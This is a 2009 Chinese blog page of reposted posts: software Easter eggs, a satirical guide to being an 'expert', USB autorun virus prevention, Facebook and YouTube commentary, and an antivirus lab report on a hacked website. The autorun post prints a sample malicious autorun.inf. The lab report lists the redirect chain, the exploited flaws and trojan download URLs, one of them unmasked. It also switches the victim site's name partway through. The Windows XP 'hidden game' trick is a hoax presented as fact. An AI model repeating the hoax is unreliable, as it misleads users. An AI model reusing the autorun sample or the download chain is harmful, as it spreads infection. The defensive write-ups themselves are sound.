博客首页|TW首页| 同事录|业界社区
2009-09-30

你知道软件彩蛋吗?其实在很多软件中都隐藏着一些名为彩蛋的神秘小功能。这些功能既不是软件的Bug,也不是恶作剧,而是程序员自娱自乐的,留给用户的一个小惊喜。

这种惊喜在平时并不会出现,只有当用户执行特定操作的时候,才会闪现出来,就如同圣诞节或者生日时朋友突然掏出的礼物一样,让人眼前一亮,后来人们将这类小程序形象的称作为软件中的“复活节彩蛋”。

以前也有过介绍复活节彩蛋的许多小文章,但是文章中通常介绍的是许多以前的彩蛋,例如Windows 98这种都快消亡了的东西,那么近两年的新软件中,有哪些软件藏有复活节彩蛋呢?下面我们就将这些彩蛋一一列举出来,并将它们的激活方式告诉您。

 

Adobe Photoshop CS2中的彩蛋

(1)Adobe Photoshop CS/CS2 中同时按住 Ctrl 和 Alt 键(Mac OS X 系统按住苹果键和 Option 键),然后用鼠标点击“帮助 - 关于 Photoshop”菜单项,这是你仔细看看出来的东东和平时一样吗?

(2)Adobe Photoshop CS/CS2 的“图层/通道/路径”面板右边有一个小箭头,按住 Alt 键并点击那个小箭头,然后点击弹出菜单中最下方的面板选项,看看出来了哪位仁兄?

 

最具价值的彩蛋

许多软件的彩蛋,你只能够看到一些有趣的小动画或者软件作者隐藏的有趣元素,似乎没有任何实际意义。所以接下来将向大家隆重介绍一个非常有价值的彩蛋,激活这个彩蛋之后,你不仅能够看到有趣的图片,还能够获得一个非常有价值的软件充值卡。

 

软件名称:U盘病毒免疫工具

彩蛋内容:杀毒软件充值卡

开启方式:

首先在百度上搜索“安天实验室”,进入安天实验室官方网站,然后点击“免费下载”栏目,下载安天的“U盘病毒免疫工具”。下载回来这个绿色小软件之后,解压缩打开软件。在软件主界面“免疫”标签中,点击下方的“全部免疫”按钮。

 

全部免疫完成之后,接下来点击页面中的“关于”标签,然后在关于的内容中找到“安天实验室”五个字,然后双击这五个字。此时你会发现,关于页面中出现了一张《安天防线》2009杀毒软件的激活充值卡,安装安天防线之后,你可以使用这张卡上的序列号激活安天防线,享受免费的杀毒软件,怎么样,这个菜单超值吧!

 

微软的彩蛋

Windows 98时代的彩蛋就不在介绍了,只说一下Windows 2000和Windows XP的吧。

操作系统:Windows 2000

彩蛋内容:扫雷秘技

开启方式:

启动扫雷游戏,在开始游戏以后,当你第一次点击完毕的同时,马上按下“Esc”键,这时你会发现扫雷的时间停住了,一个新的扫雷世界纪录正在等待你来创造!

操作系统:Windows XP

彩蛋内容:写字板的秘密

开启方式:

联通=■:开启方法:启动Windows中的记事本程序,在其中输入“联通”后保存成TXT文件并关闭,再重新打开写有“联通”的TXT文件,奇怪的事发生了…… 。

 

操作系统:Windows XP

彩蛋内容:隐藏的小游戏

开启方式:

1,点击windows的开始键(就是Ctrl 与 alt中间那个键),然后选择运行

2,输入:cmd

3,在弹出窗口输入:win game unlock

4,好了,现在你已经成功解除了游戏的锁定

5,然后关掉这个窗口,按住刚刚那个windows开始键3秒以上(本人测试5-7秒最稳定)

6,放开windows开始键的同时,迅速在键盘上顺序敲击:uurncher

如果这是你的电脑屏幕闪了一下,祝贺你,你成功了!

挺有意思的,你要控制一辆汽车不停的狂奔,期间还会有人用东西砍你。

 

软件名称:Word 2007

彩蛋内容:百变快捷键  

开启方式:

按ctrl+shift+“=”(主键盘),光标会变为原来的一半。其实呢,这个只是上标的快捷键:

按ctrl+“=”,光标会跑到下面去,这个自然是下标的快捷键啦!

嘿嘿,下面说说真正的彩蛋。

按ctrl+alt+“+”(主键盘),光标发生很神奇的变化;

按ctrl+alt+“-”(主键盘),光标发生很神奇的变化;

按ctrl+alt+“+”(小键盘),光标发生很神奇的变化;

嘿嘿,看惯了箭头,换个样子,还有点意思!

 

其他软件

软件名称:WinRAR

彩蛋内容:潮涨潮落

开启方式:

启动WinRAR后点击“Help”菜单中的“About WinRAR”,当鼠标移动到关于窗口顶端的海景图片时,你就会发现原本静止的海水开始涨潮了(图5)!而一旦你点击鼠标,海水将回复到静止状态,再点击,再涨潮。是不是很有意思?另外你再单击左上角的书本图标,那一摞书本是不是开始下落了?落到底后还会反弹,仔细听听还有声音呢!

 

软件名称:Mozilla Firefox

彩蛋内容:Mozilla想说的话

开启方式:

Mozilla Firefox 中,地址栏输入“about:mozilla”,然后按回车,看看出来了什么?如果你看过 IE5 里面针对 Netscape 之流的玩笑彩蛋,你应该能明白 Firefox 中这段话的意思。

 

软件名称:Macromedia Studio

彩蛋内容:Flash小游戏

开启方式:

Macromedia Studio 组件之一的 Flash 8 中,打开其“关于”窗口,然后点击上方图片中的“Macromedia”字样的“i”上面那个点(请仔细操作,因为这个点只有 1 像素大小),会出现六个 Flash 小游戏。

    近日,有网友在论坛贴出《专家速成手册》,发帖者从中总结出六个特征,称只要做到这六点,人人可做“专家”,网友称其“很创意,很讽刺”。

 一、遇到什么问题都说:这很正常 

  不管别人提什么千奇百怪的问题,你都要回答:“这很正常。”这样做的好处是,既说明了自己见多识广,又能说明别人少见多怪,从而确立自己的专家地位。例如:有人问“为什么汶川地震,我们国家的地震局,没有任何的预测?”你可以说:“这很正常,地震预测是世界性难题。”有人问:“为什么地震中学校的校舍倒塌的那么多。”你可以说:“这很正常,地震的强度超过八级,所有的房屋都有倒塌的可能。”有人问:“为什么中国足球,搞了这么多年改革,现在连伊拉克都踢不过?”你可以说:“这很正常,因为足球比赛中有很多不确定因素。”有人问:“你为什么老是说这很正常?”你可以说:“这很正常,因为我是专家。” 

  二、与正常人的见解有区别 

  专家之所以称为专家,就是要见人所未见,言人所未言。例如:有人说:“物价涨的太厉害了。”你要说:“不是物价涨,是中国的东西太便宜。”有人说: “股市跌得太厉害了,政府应该救市”你要说:“不行,要坚持中国股市的自由市场经济地位,避免政府对股市的干预。”有人说:“CPI增长了8.4%,活不了了。”你要说:“这样的物价水平,大多数人都能接受。”有人说:“中国专家狗屁不懂,一天到晚就知道吃饭。”你要说:“有时候我们也吃屎。” 

  三、分点论述 

  分析问题原因的时候,要分出一二三四。这一点很重要,就算是一个原因,你也要分出一二三四来,这样做,才能显示你对问题确实有研究,不愧对专家的称号。如果说一二三四的同时,你还遵循了先世界后中国的顺序,那么你就可以成为中国的著名专家了。例如,你可以说:“我分析汶川地震中校舍大量倒塌主要有三个原因:一从世界范围上来说,都存在地震中校舍倒塌的问题。例如美国……二是校舍倒塌,主要是因为地震的强度比较大。三校舍倒塌,也存在建筑不合格的可能。”你还可以说:“我分析这次发改委提高油价有三个原因:一主要是受国际上油价上涨的影响。二人民群众对柴油的求量增加。三石油生产企业的供应量减少。”你甚至可以说:“我分析专家的可信度降低有三个原因:一从世界范围来看,专家的预测通常都不太准确。二人民群众的智商明显提高。三有些个别专家是猪,戴了个帽子,伪装成人类。” 

  四、说别人听不懂的话 

  要说那些别人听不懂或者听完之后就迷糊的话,而且自己懂不懂没关系。例如有人问:“中国平安为什么会推出如此庞大的融资计划?”你可以说:“股市最重要的功能之一就是再融资,从经济学的角度讲#¥……。”有人问:“你觉得中国楼价这么高正常吗?”你可以说:“我们必须一分为二的看问题,虽然从某个角度来说,不正常,但是从社会学上来讲……”有人问:“为什么听完您的讲话,我有点困。”你可以说:“恭喜你,你听懂了!” 

  五、有大局观念并顾左右而言他 

  有两个最重要的原则,是保证你成为专家之后能在国家媒体上保持上镜率的关键:一要有大局观念。例如,你可以说:“虽然我们的法制法规还不太完善,但是目前我们国家在这一方面已经有了长足的发展……”你还可以说:“虽然地震不可预测,但是我们国家对于地震的科研工作还是相当的重视……”你甚至可以说: “虽然中国的专家都是猪,但是我们国家在饲料中添加了许多提高智商的添加剂……”二善于顾左右而言他。例如,你可以说:“对于你提到中国看病难的问题,美国也存在这样的问题。我记得德克萨斯州1932年……”你可以说:“警察打人这样的事,只是警察队伍中个别人的个别问题,日本也有这样的情况,我记得在东京1625年……” 

  六、杀手锏:与国际接轨 

  最后这招,是大家都熟悉的绝招了,那就是:与世界接轨和中国特色。因为这是绝招,大家又是耳熟能详,所以在此,不再赘述。只举一例:有人问:“中国专家为什么工资这么高?”你可答:“与世界专家接轨。”有人问:“为什么别的国家的专家都是人,中国的却是猪?”你可答:“中国特色。” 

  综上所述,有此六技,则中国专家可成矣!

2009-09-27

  U盘对病毒的传播要借助autorun.inf文件的帮助。病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒。我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了。

 

  大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它。我提到的方法就是,在根目录下,删除autorun.inf文件。然后,根目下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,病毒就无能为力,创建不了autorun.inf文件了。以后会不会出新病毒,自动去删文件夹,然后再建立文件还不知道,但至少现阶段,这种方法是非常有效的。

用U盘先用右键打开 看第一项是否为”打开” 假如不是 “打开”而是open,auto,或者自动播放 那么肯定是中标了不过不要急右键打开 更改显示属性 显示所有文件删除autoruninf 然后用以下的方法 :

 

U盘对病毒的传播要借助autorun.inf文件的帮助。病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据 autorun.inf中的设置去运行u盘中的病毒。我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了。

 

大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它。我提到的方法就是,在根目录下,删除autorun.inf文件。然后,根目下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,病毒就无能为力,创建不了autorun.inf文件了。以后会不会出新病毒,自动去删文件夹,然后再建立文件还不知道,但至少现阶段,这种方法是非常有效的。

 

 

如何防止U盘中毒

 

计算机用户养成使用U盘、移动硬盘等移动储存设备的良好习惯,例如当外来U盘接入计算机系统时,切勿双击打开,一定要先经过杀毒处理,或是采用具有U盘病毒免疫功能的杀毒软件查杀后,再接入计算机系统,另外,关闭微软的“自动播放”功能

 

详细一点的方法有:

 

方法一.插入优盘时按住“shift”键,以防止病毒随U盘自动运行(大概5秒),等盘符出现后,单击右键选择打开优盘,调整选项,让隐藏的文件显示,若有autorun.ini文件,打开autorun.ini文件,将里面涉及到几个dll与exe文件从U盘里面删除,最后关闭autorun.ini文件,并且删除它。退出U盘!OK了!

 

方法二.利用兔子魔法关闭优盘、光盘的自动运行。手工清除病毒仍按方法一进行。

 

方法三防止优盘感染autorun.ini有关病毒,可以在U盘,C盘,D盘,…新建一个文件夹,文件夹名为autorun.ini。若发现C盘,D盘,…中优autorun.ini文件及相关的几个dll与exe文件,一定感染了木马病毒,不要双击盘符,以防病毒发作。

 

方法四 用专用杀毒工具

 

(1)http://down.hnmaths.com/soft/rjxz/wlsd/1507.html

 

(2)AUTO病毒专杀

 

(3)一个专杀ROSE病毒的工具

 

在windows xp使用过程中,在默认情况下,一旦将可移动磁盘接入电脑(将光盘插入光驱,或者接插上U盘、移动硬盘时)Windows XP的自动播放功能就读取驱动器,完成后同时显示一个对话框,要求你选择是否打开其中的视频、音频、图片文件。这项自动功能可能是你不需要的。如果你想关闭的话,可以使用这样的办法:

 

一、为可移动设备设置属性。

 

关闭单个移动存储设备的“自动播放”功能,可以通过移动存储设备的属性页来直接关闭着项功能。(这要求该移动存储设备已经存在于计算机上。)

 

1、在我的电脑或者资源管理器中右键单击需要关闭自动播放功能的移动存储设备。选择属性。

 

2、在打开的窗口中单击“自动播放”选项卡,在操作框中,选定“选择一个操作来执行”前的单选框,然后选中“不执行操作”。最后“确定”。

 

这样该设备就不会再自动打开文件夹了。

 

二、使用组策略一次性全部关闭windows xp的自动播放功能:

 

如果你想一次全部禁用Windows XP的自动播放功能,可以使用组策略。

 

1、点击“开始”选择“运行”,键入“gpedit.msc”,并运行,打开“组策略”窗口;

 

2、在左栏的“本地计算机策略”下,打开“计算机配置_管理模板_系统”,然后在右栏的“设置”标题下,双击“关闭自动播放”;

 

3、选择“设置”选项卡,勾取“已启用”复选钮,然后在“关闭自动播放”框中选择“所有驱动器”,单击“确定”按钮,退出“组策略”窗口。

 

在“用户配置”中同样也可以定制这个“关闭自动播放”。但“计算机配置”中的设置比“用户配置”中的设置范围更广。有助于多个用户都使用这样的设置。

 

提醒:“关闭自动播放”设置是只能使系统不再列出光盘和移动存储的目录,并不能够阻止自动播放音乐CD盘。要阻止音乐CD的自动播放,你就只有更改移动设备的属性了。

 

Autorun.inf文件详解及免疫方法-帮你防止U盘中毒

 

最近利用autorun.inf这个文件的病毒实在是太多了,最著名的莫过于“熊猫烧香“了。于是便有人呼吁大家打开硬盘的时候不要双击打开,而是要右键选择“打开”来打开硬盘。可是,这样就真的不会被autorun.inf文件影响了吗?我们先来看一下下面这段代码:

 

[AutoRun]

 

open=eager.exe

 

shell\open=打开(&O)

 

shell\open\Command=eager.exe

 

shell\open\Default=1

 

shell\explore=资源管理器(&X)

 

shell\explore\Command=eager.exe

 

 

 

这个便是从某个autorun.inf文件里面复制出来的。你可以试试,把以上代码复制到记事本中,然后另存为“autorun.inf”,保存到D盘去,再修改一下D盘的卷标(这样做的目的是为了使右键菜单马上更新)。现在你在D盘上点右键看一下,嗯,右键菜单还是和原来一样的。那么你再点右键选择“打开”或“资源管理器”。怎么样?是不是打不开D盘。那你会问,那如果我电脑中这种病毒了,不管怎么操作,就算我重装了系统,只要我打开硬盘就又会中病毒了吗?不用担心,还是有解决方法的。你可以通过在地址栏里面的下拉列表里面选择“本地磁盘(D:)”来打开,或者直接在地址栏输入“D:”也可以打开磁盘而不会中毒。当然还有其他方法,大家可以举一反三。

 

下面我再来介绍一下autorun.inf这个文件的格式。

 

一、[AutoRun] Keys

 

1.action

 

为open和shellexecute运行的程序指定名称.

 

2.icon

 

指定驱动器图标

 

3.label

 

指定驱动器卷标

 

4.open

 

自动运行并打开指定文件

 

5.shellexecute

 

自动运行并打开指定文件(与open不同的是可以使用文件关联信息打开文件)

 

 浏览数: 次 归类于: 未分类 — miaodeyu @ 17:01 评论(0)

2009-09-16

Facebook:没好友就买几个

Facebook的盈利能力一直被许多投资者和业内人士不看好,在尝试了推出类似QQ秀的几个赚钱板块后,Facebook最近打算又推出一个新的赚钱新花招,买好友。

对了,你没有看错,就是买好友。如果你在Facebook上感觉自己好友太少,可以通过缴纳177美元,也就是1200多元人民币的价格购买1000个好友,每个好友均价1.3元人民币,而且多买还能够打折。

都说网络时代的友谊已经变淡了,已经不值钱了,如今看来这句话是错了,1.3元一个好友,友谊都能够明码标价了,只是味道变得不是更淡了,而是更多金钱味了。只不过Facebook让用户莫名其妙的成为别人的好友究竟是通过什么手段呢?如果是牵线搭桥还好一些,但是如果是强拉硬拽的让用户添加其他付费用户为好友,那Facebook给不给被当做好友的用户分钱呢?

前不久比尔盖茨还在为Facebook上太多陌生人添加他而推出Facebook,如今掏钱就能够加好友,相信如果Facebook真想拿这个赚钱,做这种强扭瓜的皮条生意,会有更多人出走Facebook的。

新闻链接:http://www.clbiz.com/news/display.asp?ID=61553

 

Youtube:赚钱难

不仅Facebook赚钱难,目前几乎所有的Web2.0网站都没有找到一条除广告之外的发财捷径。谷歌花巨资收购的Web 2.0视频网站Youtube目前也在为盈利而苦恼。谷歌一直在为如何让YouTube赚钱而伤透脑筋。尽管拥有庞大的受众群体,YouTube仍然被认为是谷歌旗下的亏损业务。

不过最近Youtube打算用一种新模式来吸金,这种模式就收费电影。Youtube打算推出每部3.95美元的电影租赁业务,吸引类似苹果iTunes的付费用户。

不过YouTube进军电影租赁业务绝不会一帆风顺,一些电影公司将会对YouTube的计划持坚决抵制的态度。例如现在正在和Youtube打官司的派拉蒙,还有坚持电影版权不通过网络传播的迪斯尼和福克斯,最有影响力的几家大制片商如今已经拒绝和Youtube合作,依靠这个情况发展,Youtube想短期之内实现新的赚钱捷径,仍然很难。

 

苗得雨
2009-09-15

   2009年9月15日,安天实验室发现,中国旅游招商网 http://www.cliccing.com/),被黑客植入恶意代码,用户如果访问该网站,系统会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
中国旅游招商网挂马页面:

安天防线2009拦截图:

挂马层次结构:
[wide http://www.cliccing.com/ (被挂马页面)
    [script]http://z3***.net/c.js (恶意跳转链接)
        [iframe]http://z3***.net/0.htm (恶意跳转链接)
            [iframe http://ee00r.22***.org/fkzd/16.htm (恶意跳转链接)
                [iframe http://wm.245a***.cn/x150/xx.html (集成网马页面)
                    [iframe http://wm.245a***.cn/x150/td14.htm (MS06-014漏洞)
                        [script http://wm.245a***.cn/x150/14.js
                        [script http://wm.245a***.cn/x150/15.js
                        [script http://wm.245a***.cn/x150/17.js
                        [script http://wm.245a***.cn/x150/16.js
                        [script http://wm.245a***.cn/x150/18.js
                    [iframe http://wm.245a***.cn/x150/yt.htm (MS09-032漏洞)
                        [script http://wm.245a***.cn/x150/a3.jpg
                        [script http://wm.245a***.cn/x150/b.jpg
                        [script http://wm.245a***.cn/x150/url.jpg   ...
                        [script http://wm.245a***.cn/x150/c.jpg
                        [script http://wm.245a***.cn/x150/d.jpg
                        [script http://wm.245a***.cn/x150/e.jpg
                        [script http://wm.245a***.cn/x150/f.jpg
                    [iframe http://wm.245a***.cn/x150/td09.htm (MS09-002漏洞)
                        [script http://wm.245a***.cn/x150/091.js
                        [script http://wm.245a***.cn/x150/092.js
                    [iframe http://wm.245a***.cn/x150/yut.htm (子集成网马页面)
                        [iframe http://wm.245a***.cn/x150/ytfl.htm (Adobe Reader PDF文件漏洞)
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ie.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ie.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                        [iframe http://wm.245a***.cn/x150/ytfl1.htm  (Adobe Flash Player SWF文件漏洞)
                            [iframe http://wm.245a***.cn/x150/y1.htm
                                [script http://wm.245a***.cn/x150/swfobject.js
                                [flash http://wm.245a***.cn/x150/./x1.swf
                                [flash http://wm.245a***.cn/x150/./x3.swf
                                [flash http://wm.245a***.cn/x150/./x4.swf
                                [flash http://wm.245a***.cn/x150/./x2.swf
                                [flash http://wm.245a***.cn/x150/./x5.swf
                            [iframe http://wm.245a***.cn/x150/t2.htm
                                [script http://wm.245a***.cn/x150/swfobject.js
                                [flash http://wm.245a***.cn/x150/./x7.swf
                                [flash http://wm.245a***.cn/x150/./x9.swf
                                [flash http://wm.245a***.cn/x150/./x10.swf
                                [flash http://wm.245a***.cn/x150/./x8.swf
                                [flash http://wm.245a***.cn/x150/./x11.swf
                            [iframe http://wm.245a***.cn/x150/y1.htm
                        [iframe http://wm.245a***.cn/x150/of.htm (OWC10.Spreadsheet漏洞)
                            [script http://wm.245a***.cn/x150/of.js    ...               
                            [script http://wm.245a***.cn/x150/of3.jpg
                            [script http://wm.245a***.cn/x150/of.jpg
                            [script http://wm.245a***.cn/x150/of2.jpg

 

该挂马网页利用以下漏洞进行传播:
MS06-014漏洞
MS09-032漏洞
MS09-002漏洞
Adobe Flash Player SWF文件漏洞
Adobe Reader PDF文件漏洞
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit

具体漏洞描述与解决方案请参见:
http://www.antiy.com/cn/security/2009/solution.htm

当用户访问挂马网站,系统会自动下载病毒文件:
    当用户访问中国电信股份有限公司上海研究所 http://www.sttri.com.cn/)时,含有漏洞的系统会自动从恶意网站下载大量病毒文件,并在本机上运行,病毒文件主要以网络游戏盗号类木马为主,病毒的具体描述信息如下:
1、网页木马直接下载的病毒文件:
 http://d.doi***.com/xx/x150.css 病毒名:Trojan/Win32.Agent.bcos[Dropper]
病毒描述:
连接网络,读取病毒下载列表进而下载病毒文件,并在本机运行
衍生文件:
c:\Documents and Settings\a\Local Settings\Temp\~291781.ext
2、下载者木马读取下载列表地址:
 http://txt.dol***.com/xx.txt
3、由下载者木马下载的其他病毒文件:
 http://1.dox***.com/img/1.exe 病毒名:Trojan/Win32.Agent.bbgl[Dropper]
病毒描述:DNF游戏盗号木马
衍生文件:
c:\WINDOWS\system32\emHnPuBAaF7XjuXBbdxSg.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\WD7eC3pJvgmYQYNwrVP.Ttf

 http://1.dox***.com/img/2.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:梦话西游****游戏盗号木马
衍生文件:
c:\WINDOWS\Tasks\SgF9z49Ph7g5UNpM.ico
c:\WINDOWS\****ed Program Files\UYTbcaZtxE23MEzKGQ.cur

 http://1.dox***.com/img/3.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\SrNRKs5F7Rkv9hp.inf
c:\WINDOWS\****ed Program Files\JjedvMTDtPyqp9ZTrgw.Ttf

 http://1.dox***.com/img/4.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:****游戏盗号木马
衍生文件:
c:\WINDOWS\system32\K7zkXuSVDPKyz63k3V.inf
c:\WINDOWS\****ed Program Files\v2FhcJ32apapSmSX.Ttf

 http://1.dox***.com/img/5.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:大话西游 ii游戏盗号木马
衍生文件:
c:\WINDOWS\Tasks\eMjD9Pb8SvNVU8mM.ico
c:\WINDOWS\Tasks\ybmux4Mu6FUnQJEHWu.inf

 http://1.dox***.com/img/6.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:封神榜•网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\3a5XTcKYzK7KZcrfRE.inf
c:\WINDOWS\****ed Program Files\sKQvCqpPty77uXqj.Ttf

 http://1.dox***.com/img/7.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Tasks\vC6ykXbjUGCVeCJa.ico
c:\WINDOWS\****ed Program Files\WUstNjhyfQfpv8PQbC.cur

 http://1.dox***.com/img/8.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:神鬼传奇游戏盗号木马
衍生文件:
c:\WINDOWS\Tasks\x7j7yet9WK9FdYSD.ico
c:\WINDOWS\Tasks\CgbYR44s5jCmgAd6ar.inf

 http://1.dox***.com/img/9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:封神榜•网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\2exJW3dsaTgWrf5uAPadmHN.dll
c:\WINDOWS\Fonts\HXxfduw9KeQTCeP6Z.Ttf

 http://1.dox***.com/img/10.exe 病毒名:Trojan/Win32.Magania.bwsi[GameThief]
病毒描述:****游戏盗号木马
衍生文件:
c:\WINDOWS\****ed Program Files\v2FhcJ32apapSmSX.Ttf
c:\WINDOWS\****ed Program Files\6YYnDBbzHzrrmenHmv.cur

 http://2.dox***.com/img/11.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:完美世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

 http://2.dox***.com/img/12.exe 病毒名:Backdoor/Win32.Small.ye
病毒描述:后门类木马
衍生文件:
C:\WINDOWS\71M.exe

 http://2.dox***.com/img/13.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\SCEVFJRCmaB7.dll
c:\WINDOWS\Fonts\G8qZ5hBX7H.Ttf

 http://2.dox***.com/img/14.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\CDuAUVkGy9.dll
c:\WINDOWS\Fonts\2knxWtV****WXmUdGG.Ttf

 http://2.dox***.com/img/15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

 http://2.dox***.com/img/16.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\PERrGx5DkqSbQdwauCRQH.dll
c:\WINDOWS\Fonts\eSEWZRdrSK3NeEJVy4.Ttf

 http://2.dox***.com/img/17.exe 病毒名:Trojan/Win32.Magania.bwyr[GameThief]
病毒描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\BtmBAnd89jc9PsPq5EKNj.inf
c:\WINDOWS\****ed Program Files\uMub3WCE6aZ3nFgrYRX.Ttf

 http://2.dox***.com/img/18.exe 病毒名:Trojan/Win32.Magania.bwxz[GameThief]
病毒描述:剑侠世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

 http://2.dox***.com/img/19.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf
c:\WINDOWS\Fonts\A97CRaCB.fon

 http://2.dox***.com/img/20.exe 病毒名:Trojan/Win32.Magania.bwxz[GameThief]
病毒描述:诛仙、口袋西游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\rfpz9wwyy2np.dll
c:\WINDOWS\Fonts\vztr58qstaca8y8j.Ttf

 http://2.dox***.com/img/22.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\pEcFwPj48y6DADf87r.inf
c:\WINDOWS\****ed Program Files\EpapzVpa3DRCkpPR.Ttf

 http://2.dox***.com/img/23.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\eYNMAnskCCBQCc8Jp.inf
c:\WINDOWS\****ed Program Files\WFsARAucm7DAuX8.Ttf

 http://2.dox***.com/img/24.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:仙剑游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\P6VyQtQJUYa3rFan7J.inf
c:\WINDOWS\****ed Program Files\eVaMpZ3AmmmbCPjX.Ttf

 http://2.dox***.com/img/25.exe 病毒名:Trojan/Win32.Magania.bwsr[GameThief]
病毒描述:封神榜网络版游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\B4yNKrEEhEerKFeeA4.inf
c:\WINDOWS\****ed Program Files\PRKUkXR8NQ8ydQmw.Ttf

 http://2.dox***.com/img/26.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
病毒描述:游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\qzp3jTZCSfSh.dll
c:\WINDOWS\Fonts\qWskzsQA6.Ttf

 http://2.dox***.com/img/27.exe 病毒名:Trojan/Win32.Magania.bwxz[GameThief]
病毒描述:大话西游3游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

 http://2.dox***.com/img/28.exe 病毒名:Trojan/Win32.Slefdel.edn
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\71C.exe

 http://2.dox***.com/img/29.exe 病毒名:Trojan/Win32.Magania.bwxz[GameThief]
病毒描述:武林2、诛仙、口袋西游游戏盗号木马
衍生文件:
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

 http://2.dox***.com/img/30.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:华夏2游戏盗号木马
衍生文件:
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

 http://2.dox***.com/img/31.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Tasks\vC6ykXbjUGCVeCJa.ico
c:\WINDOWS\****ed Program Files\WUstNjhyfQfpv8PQbC.cur

 http://2.dox***.com/img/32.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\DMvJFcDsGe5Kccsmc6gZFjB.inf
c:\WINDOWS\****ed Program Files\sFTeYEwVMFwRyW7hr.Ttf

 http://2.dox***.com/img/33.exe 病毒名:Trojan/Win32.Agent.adxr[Dropper]
病毒描述:ms08-067 exploit漏洞溢出木马
衍生文件:
c:\Documents and Settings\a\Local Settings\Temp\11231237

 http://2.dox***.com/img/35.exe 病毒名:Trojan/Win32.Agent.cwlm
病毒描述:Dropper类木马辅助,遍历进程查找结束QQ.EXE、监视QQ安全中心窗口如发现则将其窗口隐藏
衍生文件:

 http://2.dox***.com/img/36.exe 病毒名:Trojan/Win32.Agent.bcvr[Dropper]
病毒描述:QQ盗号木马
衍生文件:
c:\Program Files\Internet Explorer\Top.dll
c:\Program Files\Internet Explorer\Top.tmp
c:\Program Files\Internet Explorer\Top.bak

 http://2.dox***.com/img/37.exe 病毒名:Trojan/Win32.Small.kdk[****er]
病毒描述:木马下载器连接http://2.boksx.com/dd.exe下载病毒文件
衍生文件:
C:\DOCUME~1\a\LOCALS~1\Temp\459372

安天反病毒工程师建议:
1. 使用安天防线2009或锐甲可以有效防范此挂马网页。
2. 用安天防线2009可以查杀此挂马网页下载的病毒文件。
